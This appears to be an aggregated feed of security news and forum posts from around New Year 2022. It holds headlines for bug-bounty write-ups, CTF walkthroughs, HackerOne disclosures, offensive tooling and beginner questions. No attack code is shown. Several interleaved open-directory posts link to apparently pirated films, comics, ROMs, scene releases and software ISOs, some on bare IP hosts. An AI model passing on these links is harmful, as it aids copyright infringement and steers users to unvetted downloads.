    A Beginner's Story on How a Cheapo Standard Issue Router was hacked.
    submitted by /u/secnigma [link] [comments]  ( 1 min )
    One of my better-documented exploits, CVE-2017-5816 whitepaper
    submitted by /u/oxagast [link] [comments]
    Vulnerability in log4j 2.17.0 more hype than substance | LunaSec
    submitted by /u/breadchris [link] [comments]  ( 1 min )
    /r/netsec's Q1 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 2 min )
    Malicious Telegram Installer Drops Purple Fox Rootkit
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    google/log4jscanner: A log4j vulnerability filesystem scanner and Go package for analyzing JAR files.
    submitted by /u/maryetan [link] [comments]
    C++ Memory Corruption (std::vector) - part 2
    submitted by /u/Gallus [link] [comments]  ( 1 min )
  • Open

    Vulnerability in Log4j 2.17.0 more hype than substance
    Article URL: https://www.lunasec.io/docs/blog/log4j-hype-train/ Comments URL: https://news.ycombinator.com/item?id=29782471 Points: 2 # Comments: 0  ( 6 min )
  • Open

    SecWiki News 2022-01-03 Review
    SecWiki Weekly (Issue 409) by ourren; QingScan: glue for vulnerability scanners by ourren. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Optimizing Windows Function Resolving: A Case Study Into GetProcAddress - phasetw0
    submitted by /u/dmchell [link] [comments]
    airbus-cert/Invoke-Bof: Load any Beacon Object File using Powershell!
    submitted by /u/dmchell [link] [comments]
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts, this Christmas I played the “Yogosha CTF 2021” challenge as I got a mail from their team on 28th December, and I…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone, this is Ayush, and from today, 01–01–2022, I’m going to start the 100daysofhacking challenge to improve my hacking skills. So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak of Private Details
    I wish you, readers, a Merry Christmas and a Happy New Year. May this year bring us nothing more than love, joy, happiness, P1, P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing well; 2021 is likely to be the year of the data breach because many big tech companies…  ( 3 min )
  • Open

    CaptfEncoder v3.0.1, a cross-platform cybersecurity toolkit
    CaptfEncoder is a cross-platform cybersecurity toolkit; v3 is developed in Rust, with a small executable, higher speed, better performance and more features.  ( 1 min )

  • Open

    Quick question
    I am a novice, please go easy on me for asking this, lol. If I am asked to assign an IPv4 address to a PC NIC, what does this look like in the CLI? Is this the same as simply assigning an IP to the PC itself, or is it something else? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Master's degree: good and cheap ones?
    Don't ask why; I know most companies don't give a crap, I know they prefer experience, etc. Until I can get a job that isn't with my current employer/in this sector, I have to play the game as best I can. I am trying to find both a cheap and good master's degree program I can do part time and online (or at least one that is ABET-accredited, or would make managers who only care about ABET happy). I am looking at both computer science and cybersecurity master's, but I got a B.S. in cybersecurity, which makes a master's in computer science hard to get into. So far, the only one I have found that checks those boxes is Georgia Tech's online master's (though I seriously doubt they will let me into the computer science program, so I will have to do the cybersecurity one). I keep digging around, but it seems all the ones I can find either charge high rates and/or lack anything actually being taught. Do you guys know of any? All the digging around I have done has shown me that it's that or get ready to fork out 30k+ (if I didn't already pay too much for my B.S.). submitted by /u/RandomPerson05478 [link] [comments]  ( 2 min )
    Is NET::ERR_CERT_DATE_INVALID a sure sign of danger?
    "Your connection is not private Attackers might be trying to steal your information from www.url.example (for example, passwords, messages, or credit cards). Learn more NET::ERR_CERT_DATE_INVALID" Hello, Recently (past few days) I have been taking up an avenue of search that has led me to many primeval websites from 2009 and earlier, And I have noticed a frequent pattern that Chrome does not want me to access these websites. However, I am having a hard time figuring out if the websites are actually dangerous or, in typically invasive fashion, the Chrome devs have simply put a roadblock in the way of accessing sites that aren't up to current standards (because sometimes they MIGHT be dangerous). Again, this is happening to rather old and niche websites from the birth of the internet. At the bottom of the warning page is a large, friendly button, saying, "Take me back to safety", which links to the chrome homepage. Thanks, and apologies if I have broken the sub rules somehow submitted by /u/Icy_Ad2505 [link] [comments]  ( 1 min )
    What is the general best practice for preventing brute force attacks while minimizing user impact?
    I am trying to understand how to best prevent brute-forcing attacks on various externally accessible services. If you limit the number of attempts for a given account, then you solve the brute-forcing quandary but introduce another attack vector where someone can indefinitely lock legitimate users out of their accounts by just knowing their username. You can limit it by something like IP, but there have been several real-world examples which show how cheap it is to quickly spin up thousands of different IPs to bypass this protection via AWS/Azure. I'm not aware of any other techniques that could distinguish legitimate requests from illegitimate ones. My thinking was something like a system in which successful logins log the IP from which the account was accessed and allow login attempts from that IP even if the user is locked out. However, that also has some underlying issues. What is the general security best practice for this sort of attack? submitted by /u/awedRaisins7 [link] [comments]  ( 5 min )
  • Open

    What is fuzzing? Why is it used?!
    Fuzzing is one of the most important techniques that hackers, or #BugHunters, or better said #PenTesters, use to… Continue reading on Medium »  ( 1 min )

    The Who 24 Bit Vinyl Pack
    http://www.xuxinlei.com/downloads/The%20Who%2024%20Bit%20Vinyl%20Pack/ [DIR] 1967 - The Who - The Who Sell Out [24-96]/ 2021-12-28 13:42 - [DIR] 1968 - The Who - Dogs & Call Me Lightning (mono single, 24-96)/ 2021-12-28 13:42 - [DIR] 1969 - Tommy [vinyl]/ 2021-12-28 13:42 - [DIR] 1971 - The Who - Meaty Beaty Big And Bouncy (24-96)/ 2021-12-28 13:42 - [DIR] 1974 - The Who - Odds & Sods/ 2021-12-28 13:42 - [DIR] The Who - A Quick One [24-96]/ 2021-12-28 13:42 - [DIR] The Who - My Generation (1965) [flac] {CR 200g, mono, 24-96}/ 2021-12-28 13:42 - [DIR] The Who - Quadrophenia (1973) [VINYL] {24-96} {Classic 200g Quiex SV-P}/ 2021-12-28 13:42 - [DIR] The Who - Who’s Next 1971/ 2021-12-28 13:42 - submitted by /u/Dagad0s
    music, movies, tv
    small bit of Iranian music Index of /music/Various-Artists--Artesh-128 (r3d-dl.online) more music Index of /music/playlist (blackthebeastmusic.com) movies and tv series (Only some with English audio) Index of /download (zoppello.fr) submitted by /u/International_Milk_1
    Old scene releases (1999-2007)
    https://c64.rulez.org/pub/c64/Scene/Old/ submitted by /u/-ForFuckSake
    Some scene releases for software, games and other things
    http://75.86.210.23/archive/ submitted by /u/-ForFuckSake
    Metroid (GBA) hacks and scripts
    submitted by /u/Pleasant_Jelly_8397
    NES, SNES, GBA roms
    submitted by /u/Pleasant_Jelly_8397
    Images of "tiers" (memes)
    submitted by /u/Pleasant_Jelly_8397
    RPG rulebooks
    submitted by /u/Pleasant_Jelly_8397
    various stuff
    Music (amateur bands, I guess) Index of /audio (randanderson.com) Music mashups, Oasis, Christmas and non music stuff. Index of /ayrshiredj/website/Stuff (seedhost.eu) christmas songs. Make a playlist Musical index of /radio/christmas/ (foamtotem.org) submitted by /u/International_Milk_1

    cedowens/Inject_Dylib: Swift code to programmatically perform dylib injection
    submitted by /u/dmchell

    Turning off Wi-Fi & Bluetooth interfaces automatically in iOS
    submitted by /u/hoytva
    A simple, high-level framework on how & when to effectively use WAFs
    submitted by /u/jubbaonjeans
    Kickstop the Blind Ego (BlindEagle writeup by sn0wmonster from 2016)
    submitted by /u/sn0wm0nster

    How I was able to bypass a Pin code Protection
    Hello guys, I hope all are doing good. My name is Kerolos Sameh (AKA xko2x), I’m a 17-year-old bug hunter on HackerOne. Continue reading on Medium »
    He is already here: Privilege escalation due to invalidating current users
    Dear sir/madam, we are back again. Our story today is about privilege escalation. This vulnerability enables the unauthorized user to add an… Continue reading on Medium »
    The Story Of How I Bypass SSO Login
    Hello everyone, Continue reading on Medium »
    elasticpwn: how to collect and analyse data from exposed Elasticsearch and Kibana instances
    Your Elasticsearch and Kibana instances are open, and that’s a real problem. Continue reading on Medium »
    Bug Bounty Recon: Vertical Correlation (and the secret to succeeding).
    Vertical Correlation — The process of finding subdomains from a root domain. Continue reading on Medium »

    EMAIL SPOOFING
    Khan Academy disclosed a bug submitted by hackthedevil: https://hackerone.com/reports/496360
    Default credentials lead to Spring Boot Admin dashboard access
    8x8 disclosed a bug submitted by sparroww: https://hackerone.com/reports/1417635

    SecWiki News 2022-01-02 Review
    playwright: Playwright is a framework for Web Testing and Automation - crawler, by ourren. For more recent articles, visit SecWiki

    @RealTryHackMe #AdventOfCyber Series: Challenge 16 — Ransomware Madness #TisTheSeasonForHacking
    Another day, another challenge… Continue reading on Medium »
    OSINT — Free Tools for better Satellite Imagery
    Hello Everyone, in this article we will be looking at some of the free and effective tools for Satellite imagery. Every tool has got some… Continue reading on Medium »

    Intigriti’s December XSS challenge By E1u5iv3F0x
    This year’s Christmas challenge is crafted by E1u5iv3F0x. It was very original and educational. Continue reading on Medium »

    ZIP file has been "obfuscated" and claims to be the 65536th part of a multi-volume archive. (cannot extract)
    submitted by /u/GalaxyDan2006
    My college gave me a voucher for the CHFI. What study material exists for it?
    Title really says it all. I am aware of people's views on EC-Council and hold some of my own but it's a free voucher and looks good. submitted by /u/threadstalkerpoint1

    [Translation] [Paper] BBR: Congestion-Based (Not Loss-Based) Congestion Control (ACM, 2017)
    Translator's preface: This article is a translation of Google's 2017 paper: Cardwell N, Cheng Y, Gunn CS, Yeganeh SH, Jacobson V. BBR: congestion-based congestion control. Communications of the ACM. 2017 Jan 23;60(2):58-66. Paper subtitle: Measuring Bottleneck Bandwidth and Round-trip propagation time. Before BBR, the mainstream TCP congestion control algorithms were all loss-based. That assumption dates back to the 1980s and 1990s, when link bandwidth and memory capacity were measured in Mbps and KB respectively, and link quality (by today's standards) was poor. More than thirty years later, both of these physical capacities have grown by at least six orders of magnitude, and link quality is in a different league. In particular, in modern infrastructure, packet loss and latency do not necessarily mean the network is congested, so the original assumption no longer holds. Starting from this fundamental problem, Google's networking team (building on earlier work) designed and implemented a new congestion control algorithm based on congestion itself rather than on loss or delay, abbreviated BBR. Put simply, BBR uses the RTT information carried in acknowledgement packets (ACKs) together with the number of bytes already sent to compute the real delivery rate, and then uses that to regulate the client's subsequent sending rate, keeping a sensible amount of data inflight so that transmission bandwidth is maximised and latency is minimised. It also runs entirely on the sender and needs no changes to the protocol, the receiver or the network, so it is relatively easy to deploy. Google's global WAN (B4) had already switched all of its TCP traffic from CUBIC to BBR in 2016, improving throughput by 2 to 25 times; after some configuration tuning it went further still, to 133 times (…

    A persistent denial of service vulnerability affecting iOS
    Article URL: https://trevorspiniolas.com/doorlock/doorlock.html Comments URL: https://news.ycombinator.com/item?id=29762490 Points: 48 # Comments: 12

    Mythology and Occultist Books.
    https://www.magicgatebg.com/Books/ Looks to be both books on mythology and occultist practices. Pretty small >1gb I think. Gotta wade through some crap, but there appears to be some good resources here. submitted by /u/GiantFangedBanana
    My First Contribution
    Here's a bunch of cord-cutting apps (Firestick/Android TV) https://dr-venture.com/apks/ submitted by /u/Buddy-the-elf321
    pictures of carpet
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    iron maiden albums zipped -(SEE COMMENT for content.) Happy new year everybody
    submitted by /u/International_Milk_1

    WHAT IS OSINT?
    OSINT (Open Source Intelligence) means open source intelligence. In short, we can say it is a passive information gathering tool. Passive… Continue reading on Medium »

    How I Reverse-Engineered one of the biggest GSM Operator’s application.
    This is a story of how I found a critical bug in one of the biggest GSM Operator’s application in our country. Continue reading on Medium »
    AlbusSecurity:- Penetration-list 01 Information Disclosure — Part 1
    Hello Listeners, I hope you all are well. Firstly I will introduce myself I’m Aniket, I’m an Information technology officer at 5f eco… Continue reading on Medium »
    Oversimplified — Bug Bounty
    Undoubtedly, most of us believe that finding vulnerabilities in the software looks something like the image above. “Hacking” has always… Continue reading on Medium »
    UNAUTHORIZED ACCESS LEADS TO PII DATA LEAKAGE
    Hello Everyone, Continue reading on Medium »
    One Click To Account Takeover
    Hello amazing hunters. Continue reading on Medium »
    A tale of zero click account takeover
    Hello there! I hope everything is going well with you; today I’m back with the story of my first critical discovery on Hackerone, which is… Continue reading on Pentester Nepal »

    Go Fuzzing
    Article URL: https://tip.golang.org/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=29761092 Points: 175 # Comments: 49

    I found and fixed a vulnerability in Python's source code
    submitted by /u/sn1pr0s
    Fixing the Unfixable: Story of a Google Cloud SSRF
    submitted by /u/xdavidhu
    Build your own reconnaissance system with Osmedeus Next Generation
    submitted by /u/j3ssiejjj

    AQUATIC PANDA in Possession of Log4Shell Exploit Tools
    submitted by /u/dmchell
    Phishing o365 spoofed cloud attachments
    submitted by /u/dmchell
    Windows Process Listing using ToolHelp32 API
    Get a detailed walk-through on the code of process listing using ToolHelp32 API from scratch. You will also learn to enumerate the threads and modules for each process and will know about its advantages and challenges https://tbhaxor.com/windows-process-listing-using-toolhelp32/ submitted by /u/tbhaxor
    Code snippets for windows api exploitation for red and blue teams
    https://github.com/tbhaxor/WinAPI-RedBlue submitted by /u/tbhaxor

    SecWiki News 2022-01-01 Review
    2021 security architecture summary and 2022 security direction outlook, by ourren. For more recent articles, visit SecWiki

    A question about subnetting.
    I'm very new to networking so apologies if this is a stupid question. I'm given a network ID of 172.16.1.0 /24. I need to subnet this for LAN 1 (60 hosts) and LAN 2 (20 hosts). I believe my network ID for LAN 1 will be 172.16.1.0 /26, and for LAN 2 it will be 172.16.1.64 /27. The issue is, when I try to assign LAN 1's network ID to G/0/0/0 with the subnet mask of 255.255.255.192 it doesn't work. I understand that it's class B which is usually 255.255.0.0, but if the CIDR is /26 shouldn't it be 255.255.255.192 despite this? Any feedback would be greatly appreciated, thank you! submitted by /u/crumbjuice

    How to use ChopChop to scan endpoints and identify exposed sensitive content
    Helps researchers perform dynamic application testing against web applications.

    The story of my main Weapon ⚔️ (ZAP and Proxify)
    By Korean time there are about 30 minutes left until the new year, and this will probably be my last post of the year. It feels like I only just did my 2020 retrospective, but the 2021 retrospective has already come and gone 😱 Today I want to talk about one item from my retrospective, my Main Weapon :D Main Weapon? Which tool do you like best when doing analysis? The one tool you could pick here is what I think of as the Main Weapon. I was a Burpsuite user for a long time; from around 2018 my interest in ZAP grew strongly again, and in the end, up until last year, I stuck with a dual style of using Burpsuite and ZAP side by side.

    Should I Block/Disable ICMP on router Firewall?
    Should I disable ICMP ports on my ISP's router's firewall? I have heard a mix of different things. I'm trying to increase security, but I understand it will impact network monitoring by disabling it. I'm looking to disable ping. This router doesn't have many options besides disabling incoming & outgoing and setting custom rules. Should I just disable incoming ICMP? What can I do, if anything, that will increase the security of ICMP? submitted by /u/Wind0ze_User
    Tiktok
    1. Is it true that the TikTok app is spyware? Can they access and watch us through our phone's camera even when we're not using the app? 3. If this is true, then how is that even legal, to spy on users? Especially minors, who use this app more. submitted by /u/hamza_37
    Spyware
    Will a malware/virus/spyware still exist even after you uninstall an app from the Play Store or not? I downloaded many strange apps from the Google Play Store, uninstalled them and ran a Malwarebytes scan and nothing bad showed up. Should I still be worried? submitted by /u/hamza_37
    About blockchain dapps security
    Hello, I'm a pen testing student doing my OSCP right now and I'm interested in blockchain and dapp security/pentesting. Is there a roadmap? What skills must I acquire to get me there besides learning a dapp language like Plutus or Solidity? Thanks in advance! submitted by /u/GeorgiosSAK

    Open-Source Intelligence (OSINT) Reconnaissance
    *Note: This article was originally published by the author on November 5, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »
    OSINT tweets liked by @aqfiazfan in Jan — Dec 2021
    I have always used Twitter's likes feature as an important cabinet for storing OSINT-related information that I find interesting… Continue reading on Medium »
    TryHackMe — Sakura Walkthrough
    Sakura is an OSINT-focused room created by The OSINT Dojo. The room is designed to test a variety of OSINT techniques, such as social… Continue reading on Medium »

    Evasion & Obfuscation Techniques
    *Note: This article was originally published by the author on November 7, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »

    Over 2.2k fonts that you can extract to your Fonts folder. (.ttf / .otf)
    Hey everyone, I have a zip file that has over 2.2k fonts that you can just extract into your Fonts folder, for example: C:\Windows\Fonts Here is the zip file, hope everyone enjoys. zip: https://drive.google.com/file/d/1bk_CFZn8CYeYDX_yiE_CPNVh4aKz2Oea/view?usp=sharing (G.Drive) submitted by /u/imjustalazyretard
    My OD. Movies, Documentaries, Music, Software, ISO's and some other data.
    https://truth-or-ner.xyz/shared/ A little bit of my personal data hoard. Server has 1Gbit/s upload speed so you can grab what you want pretty quickly. Enjoy. Also happy new year! I believe that HTTPS is important but here's a link if you want to access the site without it: http://truth-or-ner.xyz/shared/ Some examples from the OD, what to expect: ISO's: Adobe Master Collection 2021, Windows 7 original, untouched versions Movies and Series: Karen, The Death of Stalin, Paper Towns, Nanny McPhee, Hidden Figures, The billion dollar code[series] Docu: Pandas 2018 docu, Inside facebook - Secrets Of A Social Network, The British Empire in Colour (3 ep) Music: mainly 2010's pop and dance I have uploaded a few more things since KoalaBear made the OD scan, so here's a new one: Extension (Top 5) Files Size .mkv 20 70.73 GiB .iso 6 42.51 GiB .mp4 9 12.99 GiB .zip 9 5.25 GiB .flac 49 1.69 GiB TOTAL 117 133.43GiB submitted by /u/techleves
    Top 250 imdb movies-But see comment
    submitted by /u/International_Milk_1
    Books/Manuals (includes Harry Potter, Alex Rider)
    submitted by /u/International_Milk_1
    runaways comics
    submitted by /u/International_Milk_1
    Ace Books (https://en.wikipedia.org/wiki/Ace_Books)
    submitted by /u/International_Milk_1
    Comics - Google Drive (let's see if this lasts any longer)
    submitted by /u/International_Milk_1
    some vertigo comics
    submitted by /u/International_Milk_1
    75 Gigs of Docs direct dl and w/torrent available
    https://archive.org/details/pbsnovadocs submitted by /u/SingingCoyote13
    Image hosting site, mainly photos for auctions
    https://www.datazap.net/sites/ Did not see any nsfw, but did not look at everything submitted by /u/c-rn

    serpentine - C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends
    submitted by /u/jafarlihi
    New year, new password habit
    submitted by /u/Novel_Author

    Javascript 101 — Comparison & Conditions — 04
    Before reading that article you can also check Javascript-101 Embedding objects and arrays. Continue reading on Medium »
    My first Google HOF
    Whoever starts learning about bug hunting, their dream is to get a bounty and HOF from Google. I too got successful in June 2021 when I… Continue reading on Medium »
    AWS Lambda Command Injection
    Command Injection vulnerability is a daunting one. In this vulnerability, a threat actor can execute arbitrary commands on a host. Continue reading on Towards AWS »

    SecWiki News 2021-12-31 Review
    A 10,000-word long read: a brief ten-year history of IoT, by ourren; Typora license decryption and analysis, by ourren. For more recent articles, visit SecWiki

    @RealTryHackMe #AdventOfCyber Series: Challenge 5 — Pesky Elf Forum
    Another day, another challenge… Continue reading on Medium »
    @RealTryHackMe #AdventOfCyber Series: Challenge 4 — Santa’s Running Behind
    Another day, another challenge… Continue reading on Medium »

    Improper authorization allows disclosing users' notification data in Notification channel server
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/1314162 - Bounty: $2000
    ADB Backup is enabled within AndroidManifest
    Zivver disclosed a bug submitted by hack_4fun: https://hackerone.com/reports/1225158

    PIT HackTheBox Walkthrough
    Pit is a CTF Linux box with difficulty rated as a medium on Hack The Box platform. Let’s deep dive into breaking down this machine. The post PIT HackTheBox Walkthrough appeared first on Hacking Articles.

    FreeBuf Morning Report | Kyoto University accidentally loses 77TB of data; 5 cybersecurity trends to watch in 2022
    Kyoto University announced on its website that, due to an error in the backup system of an HP supercomputer, the university lost about 77TB of research data.
    FreeBuf Enterprise Group Discussion | Year-end review: the 2021 of enterprise-side security people
    Which events this year left a deep impression on you, what did they make you think about, and what is your view of the industry's current state and development trends? Or, talking about the profession itself, what are your plans for your future career?
    FreeBuf Weekly | the "14th Five-Year" National Informatization Plan released; Apache fixes critical vulnerabilities
    We have summarised and recommended this week's hot news, quality articles and handy tools, so you don't miss any of this week's highlights!
    Analysis of the Kimsuky group's phishing campaign against the South Korean news industry
    Kimsuky is a cyber-espionage group suspected to originate from the Korean peninsula; it has been active since at least 2012.
    Why reducing friction between developers and security teams helps improve software security
    Rather than deferring security until later, make it a core part of the development process.
    Penetration testing foundations, services: attacking and defending the Struts2 framework (Part 1)
    Struts2 is a web framework under the Apache project, widely used by internet companies such as Alibaba and JD.com as well as government and enterprise portals.
    New malware iLOBleed rootkit is the first to target HP iLO firmware
    iLOBleed is the first malware ever to target HP iLO firmware.
    HP supercomputer system error in Japan: Kyoto University loses up to 77TB of data
    Kyoto University announced on its website that, due to an error in the backup system of an HP supercomputer, the university lost about 77TB of research data.

    Windows Process Listing Using WTS API
    In these detailed walkthroughs of process listing using WTS API, you will learn the importance of the process listing and enumeration of anti-malware agents and will get your hands dirty with the source code https://tbhaxor.com/windows-process-listing-using-wtsapi32/ https://tbhaxor.com/windows-process-listing-using-wtsapi32-2/ submitted by /u/tbhaxor

    Movies and tv, but not sure how much in English. Seems to be very slow.
    submitted by /u/International_Milk_1
    Racer X stuff
    submitted by /u/International_Milk_1
    Creating your own flair
    So you want to share a link to top secret documents. You want to call the flair "Could get you killed". Just pick any of the default flairs, enter it in the document, highlight it, and write "could get you killed" instead. submitted by /u/International_Milk_1
    comics, and Ebooks
    submitted by /u/International_Milk_1
    Kamen Rider Build BD Box Complete Series [1080p]-english subs
    submitted by /u/International_Milk_1
    Star Trek films, movies, comics, etc etc
    submitted by /u/International_Milk_1
    Ghibli's Films - Google Drive
    submitted by /u/International_Milk_1
    Bond movies (Not sure if this is the correct link)-see comment
    submitted by /u/International_Milk_1
    Games (don't know if the links work)
    submitted by /u/International_Milk_1
    Tom and Jerry cartoons
    submitted by /u/International_Milk_1
    comics
    submitted by /u/International_Milk_1
    Movies
    http://167.114.174.132:9092/movies/ Haven't looked too far thru this yet but good amount of movies. submitted by /u/Prhymus
    Indian (I'm assuming) music
    submitted by /u/International_Milk_1

    Not only cybersecurity
    Hi, I really love cybersecurity stuff, but as I practice with TryHackMe/HackTheBox labs, I feel that some programming knowledge is also required. What are your studying topics, besides offensive/defensive techniques? Can you recommend some good resources for PHP, assembler, javascript and so on? Thank you!! submitted by /u/g-simon
    DNSSEC with unsigned records set
    Hello everyone, I'm currently implementing a DNSSEC validator (at https://github.com/qdm12/dns). It's working so far, but most zones aren't signed (even google.com it seems). How is a DNSSEC validator meant to handle unsigned cases? Should it just let it through without any validation? Or should it check somewhere else if a zone is meant to be signed? Or should we patiently wait for DNSSEC to be more widely adopted? I'm wondering for example in the case an attacker hacks an authoritative nameserver like Cloudflare's 1.1.1.1 and returns bad records without their previously existing RRSIG signatures. A DNSSEC validator (without caching or on a cold boot) will not detect the bad records from Cloudflare, right? Thanks in advance! submitted by /u/dowitex
    Are Server+, Cloud+, and Linux+ certifications useful for InfoSec?
    submitted by /u/Connect_Estate_8617
    I accessed someone else's Yahoo mail by mistake. This needs to get fixed ASAP
    Hello everyone, I got a new phone number, and something really unbelievable happened to me: I was able to access someone else's Yahoo! mail account - the previous user of that phone number. I Googled it to see if anyone else has experienced this, and cybersecurity expert Brian Krebs reports that someone has in this article: https://krebsonsecurity.com/2019/03/why-phone-numbers-stink-as-identity-proof/ From the article itself: " This is exactly what happened recently to a reader who shared this account: A while ago I bought a new phone number. I went on Yahoo! mail and typed in the phone number in the login. It asked me if I wanted to receive an SMS to gain access. I said yes, and it sent me a verification key or access code via SMS. I typed the code I received. I was surprised that I didn’…
    Is IT experience a requirement for SOC Analyst?
    Is it required that you worked in the help desk or be a sysadmin? If so, how many years? Or is home experience enough for the role (example: homelab, ctfs, github projects)? submitted by /u/RaZdoT
    Phone Tapping -- Call Forwarding UNconditionally, but everything else is NOT forwarded
    So I checked my dad's phone for tapping. This is what the system message said: Call forwarding unconditionally. Voice: Not forwarded Data: Not forwarded FAX: Not forwarded SMS: Not forwarded Sync: Not forwarded Async: Not forwarded Packet: Not forwarded PAD: Not forwarded OK Given the info above, is he still being phone tapped? Last time, he was and I saw the number. Now I didn't. submitted by /u/Then-Mathematician76
    Are You Running Linux As Your Main Workstation?
    Are you running Linux as your main workstation? What do the professionals run as their main operating system? submitted by /u/No_Secret6425
    Offsec Discontinue Kali on Azure?
    Did Offensive Security discontinue support for Kali on the Azure cloud? https://github.com/Azure/azure-cli/issues/17469 Found this thread and can’t find Kali in the Azure marketplace or on their site anymore. submitted by /u/DeadbeatHoneyBadger

    Ffuf TryHackMe par
    Writeup
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.

    Read-only user can edit user segments.
    Mail.ru disclosed a bug submitted by astates: https://hackerone.com/reports/1277753
    DLL hijacking in Monero GUI for Windows 0.17.3.0 would allow an attacker to perform remote command execution
    Monero disclosed a bug submitted by fukuyama: https://hackerone.com/reports/1437942
    API- /
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1354452
    Change project visibility to a restricted option
    GitLab disclosed a bug submitted by s4nderdevelopment: https://hackerone.com/reports/1086781 - Bounty: $1370

    Windows Privilege Escalation: Kernel Exploit
    As this series was dedicated to Windows Privilege escalation, I’m writing this post to explain command practice for kernel-mode exploitation. Table of Content What The post Windows Privilege Escalation: Kernel Exploit appeared first on Hacking Articles.

    Here’s How I Could Read Anyone’s iPhone Metrics Remotely.
    Hello, my name is Faizan. I’m a security researcher. Hope you like this blog. If you’ve any questions please feel free to reach out. Continue reading on Medium »
    TryHackMe Writeup : Solar, exploiting Log4J
    Hi there, Continue reading on Medium »
    Javascript 101 - Embedding objects & Arrays — 03
    Before reading this, you can look at Javascript 101 — Arithmetic Operators, Code Editors, Functions, Objects, and Arrays — 02. Continue reading on Medium »
    Caduceus Bug Bounty Challenge
    Caduceus has just entered its public testing phase and is launching this hackathon to identify bugs. Continue reading on Medium »
    Bitswift Unlimited Mint Bugfix Postmortem
    Summary Continue reading on Immunefi »
    The Password Bypass Leads to Full-Account-Takeover
    Hola Hackers, I’m Saransh Saraf aka MR23R0 Continue reading on Medium »

    [Cellebrite Physical Analyzer] Basic usage question, easily resuming a session/case with multiple extractions
    Just started working with this program. I understand how to open and browse extractions, but I can't figure out if there's a better way to pick up where I left off after closing the program; I end up having to open/import all the extractions one by one again. For most programs that I'm familiar with, a "case" contains one or more extractions that I imported, and "opening a case" tends to be a convenient way to bring up all the extractions in one "click". However, based on how little experience I have with PA, "opening a case" seems to just be a prompt to import extractions all over again. I thought about using "project sessions", but it seems to be something that you open after all the extractions are open that remembers what analysis you've done, not necessarily what devices you were working on. Can anyone speak to this? Am I oblivious to a basic function that lets me easily open all the extractions I had open? Maybe I'm supposed to create a portable case (UFDX?) or something? submitted by /u/PieWithIceCreamCrust

    SecWiki News 2021-12-30 Review
    ZN600 telecom ONT analysis: first look, by ourren; A rich-text security filtering scheme written for developers, by ourren; Tenda AX12 router device analysis (part 2): the UPnP protocol, by ourren; A tool for finding JSP webshells through taint tracking, by ourren; Tooling for quickly probing a target firewall's outbound ports, by ourren; Talking about config-file RCE, by ourren; A scanner performance analysis case study, by ourren; Kernel-mode eBPF programs for container escape and hidden-account rootkits, by ourren; Software supply chain security development insight report (2021), by ourren. For more recent articles, visit SecWiki

    I wrote a replacement for Pyrasite to inject code into Python processes on Kubernetes
    submitted by /u/nyellin
    Bootkit samples
    submitted by /u/hardenedvault

    TryHackMe | CTF | Walkthrough | Raven
    Checkout this virtual machine on TryHackMe. LogIn on TryHackMe, go to rooms → raven1he. Link: https://tryhackme.com/room/raven1he Continue reading on Medium »

    Upgrade your OSINT investigations with Maltego
    What is Maltego anyway? Continue reading on Medium »
    OSINT — Sakura (TryHackMe walkthrough)
    The OSINT Dojo recently found themselves the victim of a cyber attack. It seems that there is no major damage, and there does not appear… Continue reading on Medium »

    FreeBuf Morning Report | WeChat mini programs need user authorization to access personal information; Amazon Alexa voice assistant oversteps
    From 21 February 2022, mini-program access to Bluetooth and contacts, and adding calendar events, must be authorised by the user.
    Threat hunting architecture and practice | a first look at the CIS 2021 Spring edition conference topics
    Threat hunting is currently recognised by the industry as one of the most effective proactive security solutions, and can minimise the harm cyber attacks do to enterprises.
    T-Mobile says the customer data breach was caused by SIM-swap attacks
    US carrier T-Mobile suffered a data breach in which an unknown number of customers were hit by SIM-swap attacks.
    DevSecOps construction: the white-box sequel
    Exploring a tool that can both satisfy an enterprise's internal automated audit needs and help white hats quickly find vulnerabilities day to day.
